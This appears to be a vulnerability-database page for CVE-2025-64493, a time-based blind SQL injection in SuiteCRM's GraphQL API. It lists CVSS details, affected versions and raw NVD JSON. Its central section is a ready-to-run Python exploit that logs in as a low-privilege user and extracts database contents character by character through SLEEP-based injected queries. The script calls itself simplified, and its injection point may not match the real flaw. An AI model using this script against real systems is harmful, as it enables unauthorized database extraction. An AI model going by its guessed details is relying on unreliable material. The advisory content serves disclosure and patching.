Security Vulnerability Report
中文
CVE-2025-64493 CVSS 6.5 MEDIUM

CVE-2025-64493

Published: 2025-11-08 02:15:35
Last Modified: 2025-11-25 17:33:59
Source: [email protected]

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 8.6.0 through 8.9.0, there is an authenticated, blind (time-based) SQL-injection inside the appMetadata-operation of the GraphQL-API. This allows extraction of arbitrary data from the database, and does not require administrative access. This issue is fixed in version 8.9.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM 8.6.0
SuiteCRM 8.6.1
SuiteCRM 8.7.0
SuiteCRM 8.8.0
SuiteCRM 8.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-64493 PoC - SuiteCRM GraphQL API Time-Based Blind SQL Injection Note: This is a simplified demonstration for security research purposes. Modify and use responsibly with proper authorization. """ import requests import json import time TARGET_URL = "http://target-suitecrm.com/api/graphql" USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_auth_token(): """Obtain authentication token via login mutation""" login_mutation = { "query": """ mutation Login($username: String!, $password: String!) { login(username: $username, password: $password) { id sessionToken } } """, "variables": { "username": USERNAME, "password": PASSWORD } } response = requests.post(TARGET_URL, json=login_mutation) data = response.json() return data['data']['login']['sessionToken'] def extract_data(token, sql_payload): """ Execute blind SQL injection via appMetadata operation sql_payload: Time-based injection payload """ headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } injection_query = { "query": f""" query {{ appMetadata( input: {{ module: "Users" where: "id = '1' AND (SELECT CASE WHEN {sql_payload} THEN SLEEP(5) ELSE 0 END)" }} ) {{ id userName }} }} """ } start_time = time.time() response = requests.post(TARGET_URL, json=injection_query, headers=headers) elapsed = time.time() - start_time return elapsed > 4 # If delay occurred, condition was true def extract_char(token, query, position, char): """Extract a single character using time-based injection""" sql_payload = f"(SELECT SUBSTRING(({query}), {position}, 1) = '{char}')" return extract_data(token, sql_payload) def main(): print("[*] Obtaining authentication token...") token = get_auth_token() print("[+] Token obtained successfully") # Example: Extract database version print("[*] Extracting database version...") db_version = "" charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._-" for pos in range(1, 50): found = False for char in charset: if extract_char(token, "@@version", pos, char): db_version += char found = True break if not found: break print(f"[*] Current version: {db_version}") print(f"[+] Extracted database version: {db_version}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64493", "sourceIdentifier": "[email protected]", "published": "2025-11-08T02:15:34.880", "lastModified": "2025-11-25T17:33:58.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 8.6.0 through 8.9.0, there is an authenticated, blind (time-based) SQL-injection inside the appMetadata-operation of the GraphQL-API. This allows extraction of arbitrary data from the database, and does not require administrative access. This issue is fixed in version 8.9.1."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. En las versiones 8.6.0 a 8.9.0, existe una inyección SQL ciega (basada en tiempo) y autenticada dentro de la operación appMetadata de la GraphQL-API. Esto permite la extracción de datos arbitrarios de la base de datos, y no requiere acceso administrativo. Este problema está solucionado en la versión 8.9.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.6.0", "versionEndExcluding": "8.9.1", "matchCriteriaId": "FF0059FB-F49A-407B-ADD3-3EC1EC50FD49"}]}]}], "references": [{"url": "https://docs.suitecrm.com/community/security-policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM-Core/security/advisories/GHSA-5gcj-mfqq-v8f7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.